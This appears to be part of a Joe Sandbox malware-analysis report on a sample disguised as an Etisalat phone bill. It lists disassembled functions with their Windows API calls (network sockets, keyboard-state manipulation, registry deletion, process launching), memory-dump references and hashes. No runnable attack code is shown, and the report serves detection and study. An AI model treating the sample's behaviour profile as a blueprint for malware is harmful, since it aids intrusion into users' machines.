                                      Function 00BD6E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00BD6F14
                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00BD6F35
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00BD6F48
                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 00BD6FFE
                                      • inet_ntoa.WSOCK32(?), ref: 00BD6FBB
                                        • Part of subcall function 00BBAE14: _strlen.LIBCMT ref: 00BBAE1E
                                        • Part of subcall function 00BBAE14: _memmove.LIBCMT ref: 00BBAE40
                                      • _strlen.LIBCMT ref: 00BD7058
                                      • _memmove.LIBCMT ref: 00BD70C1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                      • String ID:
                                      • API String ID: 3619996494-0
                                      • Opcode ID: a682b4418b5919242500a63064562ae61953f96668828026ada251be76b194fe
                                      • Instruction ID: 9af77c01802089e8a67d892433e6e9d27dd4c3021436417a474e12b6ab19a1df
                                      • Opcode Fuzzy Hash: a682b4418b5919242500a63064562ae61953f96668828026ada251be76b194fe
                                      • Instruction Fuzzy Hash: 2D81DF31508300ABD710EB24CC82EABB7E9EF84714F14499EF5559B2E2EE759D04CB92
                                      Function 00B61424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a029f5f2cd64c1b42e556215df9fe3327e5d242c8350cb0d2413bdb422da1de
                                      • Instruction ID: b7df62b8db8b1514dae39963b5840eee622db86a98fbfccfd3036c8cd43fe2d3
                                      • Opcode Fuzzy Hash: 1a029f5f2cd64c1b42e556215df9fe3327e5d242c8350cb0d2413bdb422da1de
                                      • Instruction Fuzzy Hash: 29714B70900109EFDB04CF99C889EBEBBB9FF85310F148599F915AB251C734AA51CF64
                                      Function 00BEB60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindow.USER32(016458D8), ref: 00BEB6A5
                                      • IsWindowEnabled.USER32(016458D8), ref: 00BEB6B1
                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00BEB795
                                      • SendMessageW.USER32(016458D8,000000B0,?,?), ref: 00BEB7CC
                                      • IsDlgButtonChecked.USER32(?,?), ref: 00BEB809
                                      • GetWindowLongW.USER32(016458D8,000000EC), ref: 00BEB82B
                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00BEB843
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                      • String ID:
                                      • API String ID: 4072528602-0
                                      • Opcode ID: 20291ff3b0d16ebc0c6bb19cac9a385538aeeed6b88b6b0051961aff25a17901
                                      • Instruction ID: 1a3d8df26099552ced2286afad17ef8fc0e25fe48c4ffeb47771f445d1445bdf
                                      • Opcode Fuzzy Hash: 20291ff3b0d16ebc0c6bb19cac9a385538aeeed6b88b6b0051961aff25a17901
                                      • Instruction Fuzzy Hash: FB718C74600284AFDB249F66C8D4FBBBBF9FF49300F1440A9E945976A1CB31AD51CB60
                                      Function 00BDF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00BDF75C
                                      • _memset.LIBCMT ref: 00BDF825
                                      • ShellExecuteExW.SHELL32(?), ref: 00BDF86A
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                        • Part of subcall function 00B7FEC6: _wcscpy.LIBCMT ref: 00B7FEE9
                                      • GetProcessId.KERNEL32(00000000), ref: 00BDF8E1
                                      • CloseHandle.KERNEL32(00000000), ref: 00BDF910
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                      • String ID: @
                                      • API String ID: 3522835683-2766056989
                                      • Opcode ID: 8b3a4d937fbd53ced2278e3a741c61adf9addb0bf227f6c75461ea2c6903e0eb
                                      • Instruction ID: 4e03726be09e833f49fa1754155f4aa31ebedd94bbb038e0d498651a3b3ee3ca
                                      • Opcode Fuzzy Hash: 8b3a4d937fbd53ced2278e3a741c61adf9addb0bf227f6c75461ea2c6903e0eb
                                      • Instruction Fuzzy Hash: 1A619D75A0061ADFCF14EF54C4809AEFBF4FF48310B1484AAE84AAB391DB35AD40CB90
                                      Function 00BC145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(?), ref: 00BC149C
                                      • GetKeyboardState.USER32(?), ref: 00BC14B1
                                      • SetKeyboardState.USER32(?), ref: 00BC1512
                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00BC1540
                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00BC155F
                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00BC15A5
                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00BC15C8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: e951fd784879f596d23be98ce1b2c4b8222fe13975816ceb1be3fdeecc3a94fe
                                      • Instruction ID: 13d6fa5bbc827bb335b8aaca954ac0fded837165a214e6eaeb4c93fbdef5e351
                                      • Opcode Fuzzy Hash: e951fd784879f596d23be98ce1b2c4b8222fe13975816ceb1be3fdeecc3a94fe
                                      • Instruction Fuzzy Hash: 6A51B3A06047D53EFB36562C8C45FBA7EE99B47304F0889CDE1D5AA8D3C698DC84D760
                                      Function 00BC1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(00000000), ref: 00BC12B5
                                      • GetKeyboardState.USER32(?), ref: 00BC12CA
                                      • SetKeyboardState.USER32(?), ref: 00BC132B
                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00BC1357
                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00BC1374
                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00BC13B8
                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00BC13D9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: a04713da6fcd96cd8edae5bdc389848a3014a5c8a9fd726fcdf5427c3bdd5ebb
                                      • Instruction ID: bbb92e00ef4cb2386eb869f88e7b25d4d8b2cd549760c67b7fe2959548a878a5
                                      • Opcode Fuzzy Hash: a04713da6fcd96cd8edae5bdc389848a3014a5c8a9fd726fcdf5427c3bdd5ebb
                                      • Instruction Fuzzy Hash: 6651E2A06046D53DFB3687288C45F7ABFE99B47304F0888CDE1D46A8C3D394AC94D764
                                      Function 00BC589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _wcsncpy$LocalTime
                                      • String ID:
                                      • API String ID: 2945705084-0
                                      • Opcode ID: 5a7362b1a8ddf071d7511643bff6e7718fd09133036dfa40cbadbd0d29901025
                                      • Instruction ID: c4b6f5716d3a76d7caa650c050849a58282c97bdeaa0c5c16f494a29c420fd90
                                      • Opcode Fuzzy Hash: 5a7362b1a8ddf071d7511643bff6e7718fd09133036dfa40cbadbd0d29901025
                                      • Instruction Fuzzy Hash: 4F416069C20618B6CB11FBB5888AECFB3F89F05710F508596F918E3122E734E755C7A9
                                      Function 00BC38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00BC48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BC38D3,?), ref: 00BC48C7
                                        • Part of subcall function 00BC48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BC38D3,?), ref: 00BC48E0
                                      • lstrcmpiW.KERNEL32(?,?), ref: 00BC38F3
                                      • _wcscmp.LIBCMT ref: 00BC390F
                                      • MoveFileW.KERNEL32(?,?), ref: 00BC3927
                                      • _wcscat.LIBCMT ref: 00BC396F
                                      • SHFileOperationW.SHELL32(?), ref: 00BC39DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                      • String ID: \*.*
                                      • API String ID: 1377345388-1173974218
                                      • Opcode ID: 367f54a0e1574ac5573d7564a17e9178be6df825b57ff03446d8f4ba5fd0d9f5
                                      • Instruction ID: c199b949d1048043dbb389cf47793a8eab6a9a39e42e8f221c2cb9eb0d025584
                                      • Opcode Fuzzy Hash: 367f54a0e1574ac5573d7564a17e9178be6df825b57ff03446d8f4ba5fd0d9f5
                                      • Instruction Fuzzy Hash: 0F418DB25083849AC751EF64C481EEFB7E8EF88740F4049AEB49AC3161EB74D788C752
                                      Function 00BE7500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00BE7519
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BE75C0
                                      • IsMenu.USER32(?), ref: 00BE75D8
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BE7620
                                      • DrawMenuBar.USER32 ref: 00BE7633
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                      • String ID: 0
                                      • API String ID: 3866635326-4108050209
                                      • Opcode ID: 212af269e7defba2db0b50b8ff2172deea4911d5d817c307b2d719edb244d3d0
                                      • Instruction ID: adeae8b70e98e22bf90b4ad1368c9a4d224b190e2f5fbed4644f17959b4b60f6
                                      • Opcode Fuzzy Hash: 212af269e7defba2db0b50b8ff2172deea4911d5d817c307b2d719edb244d3d0
                                      • Instruction Fuzzy Hash: 48415A75A04689EFDB20DF55D884EAABBF8FF54315F0480A9E9159B290DB30AD50CFA0
                                      Function 00BE122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00BE125C
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BE1286
                                      • FreeLibrary.KERNEL32(00000000), ref: 00BE133D
                                        • Part of subcall function 00BE122D: RegCloseKey.ADVAPI32(?), ref: 00BE12A3
                                        • Part of subcall function 00BE122D: FreeLibrary.KERNEL32(?), ref: 00BE12F5
                                        • Part of subcall function 00BE122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00BE1318
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00BE12E0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                      • String ID:
                                      • API String ID: 395352322-0
                                      • Opcode ID: 276f543fc915b229ff53968662c30cae0e7bb0c5acddd617ec71ac0e56d71ba3
                                      • Instruction ID: add257e8232e7f352f774fcbb4ebbb4107ce5de363af606d973ebe54ffd0e330
                                      • Opcode Fuzzy Hash: 276f543fc915b229ff53968662c30cae0e7bb0c5acddd617ec71ac0e56d71ba3
                                      • Instruction Fuzzy Hash: 1A3149B1901149BFDB14DF95DC89AFEB7BCEF08300F1005AAE502E3141EB749F499AA4
                                      Function 00BE653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00BE655B
                                      • GetWindowLongW.USER32(016458D8,000000F0), ref: 00BE658E
                                      • GetWindowLongW.USER32(016458D8,000000F0), ref: 00BE65C3
                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00BE65F5
                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00BE661F
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00BE6630
                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00BE664A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: LongWindow$MessageSend
                                      • String ID:
                                      • API String ID: 2178440468-0
                                      • Opcode ID: 3833a30edcfc5c34d9f63864fc4e130b372297df77239e9a74da9515794ff559
                                      • Instruction ID: 56c729a78ff53ffff1565f61ffe40553c9f2dd045650df332dac52628834d982
                                      • Opcode Fuzzy Hash: 3833a30edcfc5c34d9f63864fc4e130b372297df77239e9a74da9515794ff559
                                      • Instruction Fuzzy Hash: DA31E130714295AFDB208F1ADC89F693BE1FB6A790F1901A8F5118F2B6CB61AC40DB51
                                      Function 00BD6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00BD80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00BD80CB
                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00BD64D9
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00BD64E8
                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00BD6521
                                      • connect.WSOCK32(00000000,?,00000010), ref: 00BD652A
                                      • WSAGetLastError.WSOCK32 ref: 00BD6534
                                      • closesocket.WSOCK32(00000000), ref: 00BD655D
                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00BD6576
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                      • String ID:
                                      • API String ID: 910771015-0
                                      • Opcode ID: 86e9d05145705c184aafd97dd3d7e42baa2219711a75d9913fcd10706f04bfc8
                                      • Instruction ID: 1afe21c64ea87c6e88c36d6ed4ee0cbf039d8ec82d009e28900581d081c42da5
                                      • Opcode Fuzzy Hash: 86e9d05145705c184aafd97dd3d7e42baa2219711a75d9913fcd10706f04bfc8
                                      • Instruction Fuzzy Hash: 03319331600118AFEB10AF64DC85BBEBBEDEF45714F0480AAF9059B391EB74AD44CB61
                                      Function 00BBE0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BBE0FA
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BBE120
                                      • SysAllocString.OLEAUT32(00000000), ref: 00BBE123
                                      • SysAllocString.OLEAUT32 ref: 00BBE144
                                      • SysFreeString.OLEAUT32 ref: 00BBE14D
                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00BBE167
                                      • SysAllocString.OLEAUT32(?), ref: 00BBE175
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: 31461e8bb44e7df9ccf7fa50891e24abf26151e2819b4138fca310a2c8dc929a
                                      • Instruction ID: ebc7222f1319a7592c3a125db3c9a7529f0b560c4536a42b4bdc8575e65d37a9
                                      • Opcode Fuzzy Hash: 31461e8bb44e7df9ccf7fa50891e24abf26151e2819b4138fca310a2c8dc929a
                                      • Instruction Fuzzy Hash: CE216275605109AF9B10AFACDCC9CFB77ECEB09760B508165FA25DB2B0DAB0DC418B64
                                      Function 00BEB405 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B62612: GetWindowLongW.USER32(?,000000EB), ref: 00B62623
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00BEB44C
                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00BEB471
                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00BEB489
                                      • GetSystemMetrics.USER32(00000004), ref: 00BEB4B2
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00BD1184,00000000), ref: 00BEB4D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$Long$MetricsSystem
                                      • String ID: -es
                                      • API String ID: 2294984445-508736453
                                      • Opcode ID: dcfacf9583add3ba8a4395addcad773735439c63e6235402cb2b85360e0679b2
                                      • Instruction ID: c3a6a850be76fea3d6303f8a75652d584d71159103ac548f98f38799016fd240
                                      • Opcode Fuzzy Hash: dcfacf9583add3ba8a4395addcad773735439c63e6235402cb2b85360e0679b2
                                      • Instruction Fuzzy Hash: 362180715102A6AFDB208F39DC84F6A37F4EB05720B1047B8F926D72E1E7309911DB90
                                      Function 00BE783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B61D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B61D73
                                        • Part of subcall function 00B61D35: GetStockObject.GDI32(00000011), ref: 00B61D87
                                        • Part of subcall function 00B61D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B61D91
                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00BE78A1
                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00BE78AE
                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00BE78B9
                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00BE78C8
                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00BE78D4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
